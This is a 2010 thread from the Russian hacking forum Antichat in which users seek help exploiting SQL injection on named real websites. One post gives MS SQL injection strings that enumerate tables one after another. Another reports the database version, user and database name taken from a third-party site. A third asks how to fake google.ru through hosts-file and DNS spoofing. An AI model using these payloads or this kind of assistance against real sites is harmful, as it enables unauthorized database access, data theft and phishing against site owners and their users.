ANTICHAT Forum
HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
НОВЫЕ ТОРГОВАЯ НОВОСТИ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #14341  
Старый 13.07.2010, 00:36
Byrger
Постоянный
Регистрация: 07.03.2008
Сообщений: 479
С нами: 9567480

Репутация: 61
По умолчанию

Привет

Есть SQL инъекция

Код:
site.ru/index.php&name=1'
Поле name уязвимо

Если запрос прошел успешно то в браузере высвечивается 1 если еррор то 0

Известно что база MS SQL

Можно ли провести Blind SQL-inj? если да то подскажите статью как сделать это на MS SQL

Можно ли отправить запрос типа INSERT или UPDATE или еще что-то подобное чтоб проникнуть на сервер или изменить/создать данные в базе
 
Ответить с цитированием

  #14342  
Старый 13.07.2010, 03:21
shell_c0de
Reservists Of Antichat - Level 6
Регистрация: 07.07.2009
Сообщений: 324
С нами: 8866466

Репутация: 564
По умолчанию

2Byrger

1+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_S CHEMA.TABLES+where+TABLE_NAME+NOT+IN+((SELECT+TOP+ 1+TABLE_NAME+FROM+INFORMATION_S CHEMA.TABLES))--

потом

1+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_S CHEMA.TABLES+where+TABLE_NAME+NOT+IN+((SELECT+TOP+ 2+TABLE_NAME+FROM+INFORMATION_S CHEMA.TABLES))--

потом

1+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_S CHEMA.TABLES+where+TABLE_NAME+NOT+IN+((SELECT+TOP+ 3+TABLE_NAME+FROM+INFORMATION_S CHEMA.TABLES))--

и т.д.

(c) scipio

http://pentestmonkey.net/blog/mssql-sql-injection-cheat-sheet/

/showthread.php?t=30501
__________________
Никогда не бойся делать то, что ты не умеешь. Помни, ковчег был построен любителем. "Титаник" - проффесионалами.
 
Ответить с цитированием

  #14343  
Старый 13.07.2010, 09:43
durito
Познающий
Регистрация: 06.06.2008
Сообщений: 76
С нами: 9436363

Репутация: 55
По умолчанию

http://hotflation.com/myprofile.php?uid=185+and+1=1

а вот тут что можно придумать?
 
Ответить с цитированием

  #14344  
Старый 13.07.2010, 10:53
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
С нами: 10585560

Репутация: 1550


По умолчанию

Цитата:
Сообщение от durito  
http://hotflation.com/myprofile.php?uid=185+and+1=1
а вот тут что можно придумать?
я одного не понимаю, что ты ждешь? что бы за тебя раскрутили скулю?задолбали таки вопросы ..тут стандартная скуль, сам и раскручивай... тщательно не рекомендую никому помогать данному индивидууму, за него скуль раскручивай , а он перед своими одноклассниками будет крутым хацкером...думаю предложить за такое сразу в бан посылать.сколько таких умников которые подставляют ковычку..и постят здесь результат..и жалобно поют помочь им, а мануалы кто читать будет?

Version:5.1.47

User:hflation_hf@localhost

Database:hflation_hf

поставь перед собой вопрос как узнать инфу которую я узнал...а не ныть здесь что бы за тебя все сделали...
 
Ответить с цитированием

  #14345  
Старый 13.07.2010, 12:55
Byrger
Постоянный
Регистрация: 07.03.2008
Сообщений: 479
С нами: 9567480

Репутация: 61
По умолчанию

Цитата:
Сообщение от shell_c0de  
2Byrger
1+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_S CHEMA.TABLES+where+TABLE_NAME+NOT+IN+((SELECT+TOP+ 1+TABLE_NAME+FROM+INFORMATION_S CHEMA.TABLES))--
потом
1+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_S CHEMA.TABLES+where+TABLE_NAME+NOT+IN+((SELECT+TOP+ 2+TABLE_NAME+FROM+INFORMATION_S CHEMA.TABLES))--
потом
1+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_S CHEMA.TABLES+where+TABLE_NAME+NOT+IN+((SELECT+TOP+ 3+TABLE_NAME+FROM+INFORMATION_S CHEMA.TABLES))--
и т.д.
(c) scipio
http://pentestmonkey.net/blog/mssql-sql-injection-cheat-sheet/
/showthread.php?t=30501
Я же говорю что сайт явных ощибок не выдает так что обычная инъекция в MS SQL Не катит там где в ошибке выводится имя таблиц и так далее

Сайт сообщает только о вверном или не верном запросе
 
Ответить с цитированием

  #14346  
Старый 13.07.2010, 14:15
FlaktW
Участник форума
Регистрация: 19.08.2009
Сообщений: 115
С нами: 8803961

Репутация: 8
По умолчанию

Подскажите, как правильно настроить фейковую страничку www.google.ru

Экспериментирую на своем компе, прописываю в файле C:\windows\system32\drivers\etc\hosts

www.google.ru 1111.2222.3333.4444

http://google.ru/ 1111.2222.3333.4444

Все ровно попадаю на настоящую страничку www.google.ru

И. если можно дайте ссылку, как настроить фейковый DNS сервер.
 
Ответить с цитированием

  #14347  
Старый 13.07.2010, 15:29
durito
Познающий
Регистрация: 06.06.2008
Сообщений: 76
С нами: 9436363

Репутация: 55
По умолчанию

Цитата:
Сообщение от Gorev  
я одного не понимаю, что ты ждешь? что бы за тебя раскрутили скулю?задолбали таки вопросы ..тут стандартная скуль, сам и раскручивай... тщательно не рекомендую никому помогать данному индивидууму, за него скуль раскручивай , а он перед своими одноклассниками будет крутым хацкером...думаю предложить за такое сразу в бан посылать.сколько таких умников которые подставляют ковычку..и постят здесь результат..и жалобно поют помочь им, а мануалы кто читать будет?
Version:5.1.47
User:hflation_hf@localhost
Database:hflation_hf
поставь перед собой вопрос как узнать инфу которую я узнал...а не ныть здесь что бы за тебя все сделали...
ну зачем же сразу наезжать

я вот честно говоря не пойму, как ее раскручивать,

order by & group by не работают вроде. поэтому и спрашиваю, как крутить. вот и ставлю вопрос, как ты раскрутил?

ну нуб я и что в этом плохого. кто нубом не был?
 
Ответить с цитированием

  #14348  
Старый 13.07.2010, 15:30
Unknown
Новичок
Регистрация: 21.06.2005
Сообщений: 0
С нами: 10992741

Репутация: 0
По умолчанию

Цитата:
Сообщение от FlaktW  
Подскажите, как правильно настроить фейковую страничку www.google.ru
Экспериментирую на своем компе, прописываю в файле C:\windows\system32\drivers\etc\hosts
www.google.ru 1111.2222.3333.4444
http://google.ru/ 1111.2222.3333.4444
Все ровно попадаю на настоящую страничку www.google.ru
И. если можно дайте ссылку, как настроить фейковый DNS сервер.
Ты даже не знаешь как выглядет формат IPv4, иди вот тут прочитай http://en.wikipedia.org/wiki/IPv4 что это такое, а я тебе потом помогу настроить твой hosts.
 
Ответить с цитированием

  #14349  
Старый 13.07.2010, 17:13
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
С нами: 10585560

Репутация: 1550


По умолчанию

Цитата:
Сообщение от durito  
ну зачем же сразу наезжать
я вот честно говоря не пойму, как ее раскручивать,
order by & group by не работают вроде. поэтому и спрашиваю, как крутить. вот и ставлю вопрос, как ты раскрутил?
ну нуб я и что в этом плохого. кто нубом не был?
у мeня работает ордер бай а у тебя нет...великий дух мускуля меня боится и дает доступ..а вот тебя определил и сразу послал ... я кажется тебе ясно сказал..читай мануалы..
 
Ответить с цитированием

  #14350  
Старый 13.07.2010, 17:24
Seravin
Участник форума
Регистрация: 25.11.2009
Сообщений: 201
С нами: 8663063

Репутация: 226
По умолчанию

помогите кто с cfm

Код:
http://www.vaemergency.com/train/calendar_course.cfm?id=156
 
Ответить с цитированием
Ответ



Предыдущая тема Следующая тема
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 3 (пользователей: 0 , гостей: 3)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.